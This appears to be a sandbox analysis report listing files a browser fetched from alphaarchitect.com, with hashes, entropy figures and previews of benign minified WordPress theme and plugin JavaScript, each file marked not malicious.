                                                                                                                                                                                                                                                                        Preview:(()=>{var e={9885:e=>{function t(){this.listeners={}}t.prototype.emit=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].forEach((e=>e.apply(null,t)))},t.prototype.on=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].push(t)},e.exports=t},5626:()=>{function e(e){const t=!!e.getAttribute("data-show-if"),n=t?e.getAttribute("data-show-if").split(":"):e.getAttribute("data-hide-if").split(":"),r=n[0],i=(n.length>1?n[1]:"*").split("|"),o=function(e,t){const n=[],r=e.querySelectorAll('input[name="'+t+'"],select[name="'+t+'"],textarea[name="'+t+'"]');for(let e=0;e<r.length;e++)("radio"!==r[e].type&&"checkbox"!==r[e].type||r[e].checked)&&n.push(r[e].value);return n}(function(e){let t=e;for(;t.parentElement;)if(t=t.parentElement,"FORM"===t.tagName)return t;return null}(e),r);let s=!1;for(let e=0;e<o.length&&!s;e++)s=i.indexOf(o[e])>-1||i.indexOf("*")>-1&&o[e].length>0;e.style.display=t?s?"":"none":s?"none":"";const a=e.querySelectorAll("input,select,tex
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (3376), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):3376
                                                                                                                                                                                                                                                                        Entropy (8bit):5.0578597325887875
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:7kREoRG00VvyZPUKM9vYl7K0lW4PxhwhCTg0V90HLwS4r90HP9q9DhWS63sHES3A:7CFQODYFuDhscHEScHE2
                                                                                                                                                                                                                                                                        MD5:53FCD9568E0875FA5C27A77D194A1577
                                                                                                                                                                                                                                                                        SHA1:9AD4677DCC599A0B83D48F0D748BEC34BA95E0FE
                                                                                                                                                                                                                                                                        SHA-256:D9E7769C013BA059B0A0AC4D67465B4CA69BCE171EA279D7EB4718213AB40242
                                                                                                                                                                                                                                                                        SHA-512:66C3ED0CBC5B18E1FE15B47D4ED86935B67D755E401911CB8F8382C3879797E61668846ACCA10077963798C71AB2DDC7D443C4B73DE2D4B64A1AAC679060246D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-general.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:function playVideoAndPauseOthers(e){var i=jQuery(e).find("[data-youtube-video-id]").find("iframe"),t=jQuery(e).data("flexslider").slides.eq(jQuery(e).data("flexslider").currentSlide),o=t.find("[data-youtube-video-id]").find("iframe");i.each(function(){jQuery(this).attr("id")!==o.attr("id")&&void 0!==window.$youtube_players&&void 0!==window.$youtube_players[jQuery(this).attr("id")]&&window.$youtube_players[jQuery(this).attr("id")].stopVideo()}),o.length&&("function"!=typeof fusionGetConsent||fusionGetConsent("youtube"))&&void 0!==window.$youtube_players&&(!o.parents("li").hasClass("clone")&&o.parents("li").hasClass("flex-active-slide")&&"yes"===o.parents("li").attr("data-autoplay")&&(void 0===window.$youtube_players||void 0===window.$youtube_players[o.attr("id")]||void 0===window.$youtube_players[o.attr("id")].playVideo?fusionYouTubeTimeout(o.attr("id")):"slide"===jQuery(e).data("animation")&&0===e.currentSlide&&void 0===jQuery(e).data("iteration")?window.$youtube_players[o.attr("id")]&
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (740), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):740
                                                                                                                                                                                                                                                                        Entropy (8bit):4.721394575509887
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:12:XJUnH2UZXnmFXoIcs6eIkFuSqqUcx80e+XUr0GLLx807DvLs0G/eImtUon2Ilp2L:KHBZXsXKs6cFuSocl8oEHjG/rAPV+RLz
                                                                                                                                                                                                                                                                        MD5:8F1E1B49756247F4372CB94C852AF5E4
                                                                                                                                                                                                                                                                        SHA1:9F20CEAC4F154F6D74F3DE058AAFA34DBB65A3B4
                                                                                                                                                                                                                                                                        SHA-256:5C1E54BC74CA9478C700B98BD490D768C55D1FF6EF8DC8271C0CCA4F019CD3DC
                                                                                                                                                                                                                                                                        SHA-512:9A71FF1BFFC50BD7AD9D5FD09A0E617ED45DACFCAF71EB63AB8F6A7A156DC5D99C93705CBA00DDAC35EEED41800345A17DBB449F740BF861C57BB576932E3086
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/bootstrap.transition.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:!function(n){"use strict";n.fn.emulateTransitionEnd=function(t){var i=!1,r=this;n(this).one("bsTransitionEnd",function(){i=!0});return setTimeout(function(){i||n(r).trigger(n.support.transition.end)},t),this},n(function(){n.support.transition=function(){var n=document.createElement("bootstrap"),t={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var i in t)if(void 0!==n.style[i])return{end:t[i]};return!1}(),n.support.transition&&(n.event.special.bsTransitionEnd={bindType:n.support.transition.end,delegateType:n.support.transition.end,handle:function(t){if(n(t.target).is(this))return t.handleObj.handler.apply(this,arguments)}})})}(jQuery)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4590), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4590
                                                                                                                                                                                                                                                                        Entropy (8bit):5.219194958963683
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:ri4boDtjOHBPTs7TbTY4VwkFdtlhPLU0VGoKls0V0TR7ru3jgZgygOtK3hv:ri4boQHBPTsTbTY4Mlq/tw
                                                                                                                                                                                                                                                                        MD5:68AEAED3F9D6F17F140A5311D7FB061A
                                                                                                                                                                                                                                                                        SHA1:953C2D556057FFEFFBB2302159DBCEEDA88CF9A9
                                                                                                                                                                                                                                                                        SHA-256:DF850553B1CBE723D3B8CCF5311346CC4E3B6F410FAAE63FF0D61EED78B6A66B
                                                                                                                                                                                                                                                                        SHA-512:11FF52BC3AE4FDBB347AE61AA7827C43E4447D918210C1A18F8650FE2AFA54BE8C3AE6D31E6E60FE5FADA5C60B57472E3C186E28C3F3729DE5F2FEC0822B05A5
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-video-bg.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var $youtubeBGVideos={};function _fbRowGetAllElementsWithAttribute(e){var t,i,o=[],a=document.getElementsByTagName("*");for(t=0,i=a.length;t<i;t++)a[t].getAttribute(e)&&!jQuery(a[t]).parents(".tfs-slider").length&&o.push(a[t]);return o}function _fbRowOnPlayerReady(e){var t,i,o=e.target,a=0,d=!0;o.playVideo(),o.isMute&&o.mute(),0!==jQuery("[data-youtube-video-id="+o.getVideoData().video_id+"]").data("loop")&&(t=o.getCurrentTime(),i=+new Date/1e3,o.loopInterval=setInterval(function(){void 0!==o.loopTimeout&&clearTimeout(o.loopTimeout),t===o.getCurrentTime()?a=t+(+new Date/1e3-i):(a=o.getCurrentTime(),i=+new Date/1e3),t=o.getCurrentTime(),a+(d?.45:.21)>=o.getDuration()&&(o.pauseVideo(),o.seekTo(0),o.playVideo(),d=!1)},150))}function _fbRowOnPlayerStateChange(e){e.data===YT.PlayerState.ENDED?(void 0!==e.target.loopTimeout&&clearTimeout(e.target.loopTimeout),0!==jQuery("[data-youtube-video-id="+e.target.getVideoData().video_id+"]").data("loop")&&e.target.seekTo(0)):e.data===YT.PlayerState.P
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8308), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8308
                                                                                                                                                                                                                                                                        Entropy (8bit):5.141806109931769
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:G3+XrdT5pCvWRPtTkiiX3hlSWqlDfxALo3xs:G3yrdT5UvW/AiiHSlN8ohs
                                                                                                                                                                                                                                                                        MD5:FFFDB6679196753BCFA1767DF50FFA0F
                                                                                                                                                                                                                                                                        SHA1:B47DE9386586D4ED9ACB42CF001CBC2505B1EA10
                                                                                                                                                                                                                                                                        SHA-256:B4F6B37BECCF9DD518909C6777ED26D3AED7077538EC9F14C0F002604946C82D
                                                                                                                                                                                                                                                                        SHA-512:A1E727C214FB3C59971759D9EFB7C8C5DD6D45752CE8226771B38B74697C5BC8BACB3EDA7FE0F7E3C96D76028A6471CEFE96C965A18B51A0A55ED760E6BE9544
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define("picker",["jquery"],e):"object"==typeof exports?module.exports=e(require("jquery")):this.Picker=e(jQuery)}(function(h){var o=h(window),m=h(document),r=h(document.documentElement),g=null!=document.documentElement.style.transition;function v(r,t,n,e){var o,d,s,i,c,u;return r?(o=!1,d={id:r.id||"P"+Math.abs(~~(Math.random()*new Date))},s=n?h.extend(!0,{},n.defaults,e):e||{},i=h.extend({},v.klasses(),s.klass),c=h(r),u=(e=function(){return this.start()}).prototype={constructor:e,$node:c,start:function(){var e;return d&&d.start?u:(d.methods={},d.start=!0,d.open=!1,d.type=r.type,r.autofocus=r==b(),r.readOnly=!s.editable,r.id=r.id||d.id,"text"!=r.type&&(r.type="text"),u.component=new n(u,s),u.$root=h('<div class="'+i.picker+'" id="'+r.id+'_root" />'),$(u.$root[0],"hidden",!0),u.$holder=h(a()).appendTo(u.$root),l(),s.formatSubmit&&(!0===s.hiddenName?(e=r.name,r.name=""):e=(e=["string"==typeof s.hiddenPrefix?s.hiddenPrefix:"","string"==typ
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4290), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4290
                                                                                                                                                                                                                                                                        Entropy (8bit):5.3605300729646626
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:Dhexw5Bo+BJY461u10T+eC2BrU40VnR8e0xy4riau28a0Vcy:DhedUG4gjCSUae0w4rijKy
                                                                                                                                                                                                                                                                        MD5:63AD7E16EB210D0797C5F88BB2870471
                                                                                                                                                                                                                                                                        SHA1:57354D3753EDAAA63C69F258263879947E38E904
                                                                                                                                                                                                                                                                        SHA-256:7B39CC6490B20A7AD8B433992F1132F2C9F2CB112DEAD8E097CB91F6387C3FAB
                                                                                                                                                                                                                                                                        SHA-512:B1A51A27D2623EF0772A4012BADFDBD24AE0884367ADBC0986881B1CB3ABEC8F043BF85E659E7D6E33A0C92B47C591670D3A6958776ACBA8CC074EE93FF56365
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/cache/min/1/wp-content/themes/Avada/includes/lib/assets/min/js/library/fusion-youtube.js?ver=1733842125
                                                                                                                                                                                                                                                                        Preview:var prevCallback=window.onYouTubePlayerAPIReady,fusionTimeout=[];function registerYoutubePlayers(e){!0===window.yt_vid_exists&&(window.$youtube_players=[],jQuery(".tfs-slider").each(function(){var t=jQuery(this),a=t.find("[data-youtube-video-id]").find("iframe").length,i=!1;t.find("[data-youtube-video-id]").find("iframe").each(function(o){var u=jQuery(this);a===o+1&&void 0!==e&&(i=t.data("flexslider")),window.YTReady(function(){window.$youtube_players[u.attr("id")]=new YT.Player(u.attr("id"),{events:{onReady:onPlayerReady(u.parents("li"),i),onStateChange:onPlayerStateChange(u.attr("id"),t)}})})})}))}function onPlayerReady(e,t){return function(a){"yes"===jQuery(e).data("mute")&&a.target.mute(),t&&setTimeout(function(){playVideoAndPauseOthers(t)},300)}}function loadYoutubeIframeAPI(){var e,t;(!0===window.yt_vid_exists||jQuery("body").hasClass("fusion-builder-live"))&&((e=document.createElement("script")).src="https://www.youtube.com/iframe_api",(t=document.getElementsByTagName("script")[
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 text, with very long lines (4930), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):4931
                                                                                                                                                                                                                                                                        Entropy (8bit):5.161158701674536
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pSXOBDcsDV/2twpvQOHT/6PmG+mYjzjepwe:0kJN2twpvQOzDGbnB
                                                                                                                                                                                                                                                                        MD5:22DC776584FD42EA9406384F6D51E8A0
                                                                                                                                                                                                                                                                        SHA1:0CF7215CF36296015F1846E4E1DBEFE9472B0B6C
                                                                                                                                                                                                                                                                        SHA-256:0B2FC0AA21C08F65573E83C1CC8270ED2B2D39823B97D2C3FA3585DC8B3881C1
                                                                                                                                                                                                                                                                        SHA-512:5500FF96EFD0295486161CCF614AEA77659C539A7B3C9E0A056BDF15A5B4DF938323D24D3231E7EBB7773E9512FA33EFFE9DD6350DF071EF43001812B2A13976
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(()=>{"use strict";function t(t,e,n){var i=n?";max-age="+24*n*60*60:"";document.cookie=encodeURIComponent(t)+"="+encodeURIComponent(e)+i+";path=/;SameSite=lax"}const e={exists:function(t){return new RegExp(t+"=").test(document.cookie)},create:t,erase:function(e){t(e,"",-1)}};function n(t){return t.innerHTML?t.innerHTML:t.value}function i(t,e){t.innerHTML?t.innerHTML=e:t.value=e}function o(t){this.form=t,this.button=t.querySelector('input[type="submit"],button[type="submit"]'),this.char=".",this.button&&(this.originalButton=this.button.cloneNode(!0)),this.start()}o.prototype.setCharacter=function(t){this.char=t},o.prototype.start=function(){if(this.button){var t=this.button.getAttribute("data-loading-text");if(t)return void i(this.button,t);var e=window.getComputedStyle(this.button);this.button.style.width=e.width,i(this.button,this.char),this.loadingInterval=window.setInterval(this.tick.bind(this),500)}else this.form.style.opacity="0.5"},o.prototype.tick=function(){var t=n(this.button
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (6568), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):6568
                                                                                                                                                                                                                                                                        Entropy (8bit):5.227719091468512
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:3IrL3+ya3vBrPh/9Ckh/F0Ruk0rKG4shSuvMTEkmcXe+ax:OL3+ya35rPh/9Ck1FWuk0rj4shSEMTE9
                                                                                                                                                                                                                                                                        MD5:C5193F398E9B432ECBBE52811B752069
                                                                                                                                                                                                                                                                        SHA1:B220BF0962732E435ECB9416EBDD68F3B3A6127C
                                                                                                                                                                                                                                                                        SHA-256:FF0818862D629F2F5BBDA6B6E609874483B0A39EC5CECD17A9E7EE00C2DF4489
                                                                                                                                                                                                                                                                        SHA-512:9D63016DF40B86D64A127DB95CD635CC60538444281E2014EB0C00EE37E0A4A9445ACDFB032E1229E3CA0B2E4980F7D71FA816A0AD43BFEAB2D54E7F6E51757B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:(()=>{var e={9885:e=>{function t(){this.listeners={}}t.prototype.emit=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].forEach((e=>e.apply(null,t)))},t.prototype.on=function(e,t){this.listeners[e]=this.listeners[e]??[],this.listeners[e].push(t)},e.exports=t},5626:()=>{function e(e){const t=!!e.getAttribute("data-show-if"),n=t?e.getAttribute("data-show-if").split(":"):e.getAttribute("data-hide-if").split(":"),r=n[0],i=(n.length>1?n[1]:"*").split("|"),o=function(e,t){const n=[],r=e.querySelectorAll('input[name="'+t+'"],select[name="'+t+'"],textarea[name="'+t+'"]');for(let e=0;e<r.length;e++)("radio"!==r[e].type&&"checkbox"!==r[e].type||r[e].checked)&&n.push(r[e].value);return n}(function(e){let t=e;for(;t.parentElement;)if(t=t.parentElement,"FORM"===t.tagName)return t;return null}(e),r);let s=!1;for(let e=0;e<o.length&&!s;e++)s=i.indexOf(o[e])>-1||i.indexOf("*")>-1&&o[e].length>0;e.style.display=t?s?"":"none":s?"none":"";const a=e.querySelectorAll("input,select,tex
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (8895), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):8895
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1251289667237225
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:D8jTLvUij0QmHZtv6M5+q605tlcOGPkhNJI4IMu1NfN+A6HzRA:D8jTLvU3QmHPir0tlcOGPeIvZlXszRA
                                                                                                                                                                                                                                                                        MD5:779E173355A9E7DC02719A810A9B0A2D
                                                                                                                                                                                                                                                                        SHA1:511A81D84AB7451ADB101A8D7EC654E52D3CC92B
                                                                                                                                                                                                                                                                        SHA-256:229960D85C76FD1F3B427FF01039D98723632BC030C4BDC687057F5D3B35CD05
                                                                                                                                                                                                                                                                        SHA-512:109A964DCCCB1394DA9A612ACDE2C981EC4846D55F75D0859D9F096D86A8D65E7B146A7AC6FBBCC3E6885296AED40E30DFB33605FEF4DE405B674A9C18B6473B
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:!function(t){"function"==typeof define&&define.amd?define(["./picker","jquery"],t):"object"==typeof exports?module.exports=t(require("./picker.js"),require("jquery")):t(Picker,jQuery)}(function(t,l){var e,m=60,n=1440,h=t._;function i(n,a){var t,e=this,i=n.$node[0].value,r=n.$node.data("value"),i=r||i,r=r?a.formatSubmit:a.format;e.settings=a,e.$node=n.$node,e.queue={interval:"i",min:"measure create",max:"measure create",now:"now create",select:"parse create validate",highlight:"parse create validate",view:"parse create validate",disable:"deactivate",enable:"activate"},e.item={},e.item.clear=null,e.item.interval=a.interval||30,e.item.disable=(a.disable||[]).slice(0),e.item.enable=-(!0===(t=e.item.disable)[0]?t.shift():-1),e.set("min",a.min).set("max",a.max).set("now"),i?e.set("select",i,{format:r}):e.set("select",null).set("highlight",e.item.now),e.key={40:1,38:-1,39:1,37:-1,go:function(t){e.set("highlight",e.item.highlight.pick+t*e.item.interval,{interval:t*e.item.interval}),this.render
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (1764), with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):1764
                                                                                                                                                                                                                                                                        Entropy (8bit):5.172773988976582
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:48:hBbiQAPxzXu+gwV5IBou16xyPY0BPTPYPmke0k/ko:hpUPRX3gg2T164PHPTPYP3eVMo
                                                                                                                                                                                                                                                                        MD5:FF46C9806D7227820F30D6A36EDBC17A
                                                                                                                                                                                                                                                                        SHA1:61E4B1EE2D156A4FF673CD95DBB287DC323CA6F9
                                                                                                                                                                                                                                                                        SHA-256:10341DF946855ADC9940887DC6F1A8C8343EABFAEF8C4E1F6DCA6065F2B58F00
                                                                                                                                                                                                                                                                        SHA-512:6B520613776A4E4048BBFFB209E7D1C07D85C3F2CFF9CBF0A5E5E2DEEFAFF7BF54655A853C49A00884E91FFDC784C5ED1CA6B69CC62367FBCE50A99D969C9C45
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        Preview:"object"!=typeof window.UM&&(window.UM={}),"object"!=typeof UM.frontend&&(UM.frontend={}),UM.frontend={cropper:{obj:null,init:function(){var o=jQuery(".um-modal .um-single-image-preview img").first();if(o.length&&""!==o.attr("src")){UM.frontend.cropper.obj&&UM.frontend.cropper.destroy();var t=jQuery(".um-modal .um-single-image-preview"),r=o.parent().data("crop"),n=o.parent().data("min_width"),i=o.parent().data("min_height"),a=o.parent().data("ratio"),d=jQuery(".um-modal").find("#um_upload_single").data("ratio"),d=(d&&(a=d.split(":")[0]),jQuery(window).height()-(jQuery(".um-modal-footer a").height()+20)-50-jQuery(".um-modal-header:visible").height());o.css({height:"auto"}),t.css({height:"auto"}),jQuery(window).height()<=400?(t.css({height:d+"px","max-height":d+"px"}),o.css({height:"auto"})):(o.css({height:"auto","max-height":d+"px"}),t.css({height:o.height(),"max-height":d+"px"}));let e;"square"===r?e={minWidth:n,minHeight:i,dragCrop:!1,aspectRatio:1,zoomable:!1,rotatable:!1,dashed:!1}:
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):6028
                                                                                                                                                                                                                                                                        Entropy (8bit):7.953856521790541
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:tsQUwyaHyWrz01Sl4Kuhfq0tIIVvxrYYVotGpAGUlbvkaPxdZ0k6jhgk1I8gr/T:R01Sl7YY2oM+fVPxwHhgkGn7
                                                                                                                                                                                                                                                                        MD5:A5443E7CB93B9BFE17976D9D117FBF20
                                                                                                                                                                                                                                                                        SHA1:6D40891013F41B19FCD075996B4F2588BA1D8C81
                                                                                                                                                                                                                                                                        SHA-256:0A293582B7AF5A93E0FBBD36BE9FAAF9E9F258750914CA5CA4A2119A45FF171F
                                                                                                                                                                                                                                                                        SHA-512:41A863C6923CD04E9C79E27C566FC5FA89B1FB3D13FC501DFF7EA4CB59FD5DD15C80D89C923718D4B1E49AC3FE06B8780F28C5A9D9EC4BAB0F77B805C64740F3
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/uploads/2019/12/santa-logo-e1577124084176.png
                                                                                                                                                                                                                                                                        Preview:RIFF....WEBPVP8Lw.../....M8l.F.`{......\......#i.>$3...d.o......R...v...m0Z6.....b.)..v.1&6..u[..C.c..m.A..VB....S.W$.....w..m#..i....`..D..d. ......2....O."%%5-#*)())i.+.)))).+.999....y9.8?I.L%P.V..T...H...].+..m.8..k.]}G....,4^@..... U...nm.+.m...{....7...?......Wr.......J.....{..1.Y .K.B....B`.c.\..5j..Q..1.6.DA.`...TG2..-........a[.T..,.@...m..*.j.G.lf.8*4.hd....G.m.J...[.2.G..(bwwx..{.F.$....0.l%@.m.....m.m.......m..n..+.-..<..0...Ln..c..3.c...333..9...^.}.gT......p,...ZH...e..navP;..d...*j.Q.[..-.<..B2M....H..iG+p....yz..9.m..3.|...m..l.)S.s*...m...../].I.5...h.`D.wz...\.Z2.~......u..-....e....>.4.......oF.9m....7...S.{t9S......i....._..x./../.....V._D....G.nn.p..T.#LY.......d..@.9?U...D\W..5..Sx7O8....!...D%.....j2...T..).!9uH..d....$e.?."..=....9._?..:....|2._2.dJ....E.-.~.... ...".B .....QO..'......9.G.....2..R.!..L.`.vK.t..`#k..X......)...HS.!?.~.....B./.%..H.?1.E..q7..k......{..J....u.L_.sAXp#.'.......Bi.O.o..Ru &..
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (12578), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):12578
                                                                                                                                                                                                                                                                        Entropy (8bit):5.1861341144390165
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:192:fNZunVk59S+3h1fUoPE/HPJB3AvRbibTkzBXL+6rNGVilcNSTV3gtt45:fNYnV6PE/hB3Apie+8NPcNSFJ
                                                                                                                                                                                                                                                                        MD5:9DB07B15693407C9279F2682E83F1C1E
                                                                                                                                                                                                                                                                        SHA1:46A5F1FE7850E00770936468C0A0531E1F21582A
                                                                                                                                                                                                                                                                        SHA-256:40262D5DCD887EFA32BE2D9697D54B5B88940928AD0FE7A594075175DF66391D
                                                                                                                                                                                                                                                                        SHA-512:298C6C2817E02322A404572524D2785E96CCC3791FE77E0599B6E7AB8753CBEC626A746B4935884CBFF03F9C06E8200DC073C23E43753ECE41AC1A7CA8877094
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/libs/pickadate/picker.date.min.js?ver=3.6.2
                                                                                                                                                                                                                                                                        Preview:!function(e){"function"==typeof define&&define.amd?define(["./picker","jquery"],e):"object"==typeof exports?module.exports=e(require("./picker.js"),require("jquery")):e(Picker,jQuery)}(function(e,p){var t,y=e._;function a(t,a){function e(){return r.currentStyle?"rtl"==r.currentStyle.direction:"rtl"==getComputedStyle(t.$root[0]).direction}var n,i=this,r=t.$node[0],o=r.value,s=t.$node.data("value"),o=s||o,s=s?a.formatSubmit:a.format;i.settings=a,i.$node=t.$node,i.queue={min:"measure create",max:"measure create",now:"now create",select:"parse create validate",highlight:"parse navigate create validate",view:"parse create validate viewset",disable:"deactivate",enable:"activate"},i.item={},i.item.clear=null,i.item.disable=(a.disable||[]).slice(0),i.item.enable=-(!0===(n=i.item.disable)[0]?n.shift():-1),i.set("min",a.min).set("max",a.max).set("now"),o?i.set("select",o,{format:s,defaultValue:!0}):i.set("select",null).set("highlight",i.item.now),i.key={40:7,38:-7,39:function(){return e()?-1:1},
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (4124), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):4124
                                                                                                                                                                                                                                                                        Entropy (8bit):5.009836527230761
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:96:pKcQfyJBsb9SU7eNizYzVPaPAyy5fDjyBdjysQfYvUMmhemvmYD0ed7mhem2mv8R:AcZfk99zYz5gbylWbQfSBiprd7BLuf2
                                                                                                                                                                                                                                                                        MD5:6FFA961730A23022669E269D351AB473
                                                                                                                                                                                                                                                                        SHA1:BD7A99F25EA14D59115A4EE29619B11379EF8366
                                                                                                                                                                                                                                                                        SHA-256:717ADCF5D4112F3E61DB220F88AA9355FF9B772D5EC33B0ED47DE499C0946421
                                                                                                                                                                                                                                                                        SHA-512:C57F2EE5AB13E0942F7DC59EC0CA40E8E149E49AF8788E448A96D6A2FC8815D1F32360EB5B5DD7DA21862FC4646B035A59FCF8CDD6A0DACD84C4BDE3EB933F7D
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                                                                                        URL:https://alphaarchitect.com/wp-content/plugins/ultimate-member/assets/js/um-modal.min.js?ver=2.9.1
                                                                                                                                                                                                                                                                        Preview:jQuery(document).ready(function(){jQuery(document).on("click",".um-popup-overlay",function(){remove_Modal()}),jQuery(document).on("click",'.um-modal-overlay, a[data-action="um_remove_modal"]',function(){um_remove_modal()}),jQuery(document).on("click",'a[data-modal^="um_"], span[data-modal^="um_"], .um-modal:not(:has(.um-form)) a',function(e){return e.preventDefault(),!1}),jQuery(document).on("click",".um-finish-upload.file:not(.disabled)",function(){var e=jQuery(this).attr("data-key"),a=jQuery(this).parents(".um-modal-body").find(".um-single-file-preview").html(),a=(um_remove_modal(),jQuery(".um-single-file-preview[data-key="+e+"]").fadeIn().html(a),jQuery(".um-field[data-key="+e+"]").find(".um-single-fileinfo a").data("file"));jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find(".um-btn-auto-width").html(jQuery(this).attr("data-change")),jQuery(".um-single-file-preview[data-key="+e+"]").parents(".um-field").find('input[type="hidden"]').val(a)}),jQuery(document)
                                                                                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with very long lines (19515), with no line terminators
                                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                                        Size (bytes):19515
                                                                                                                                                                                                                                                                        Entropy (8bit):5.093588280605114
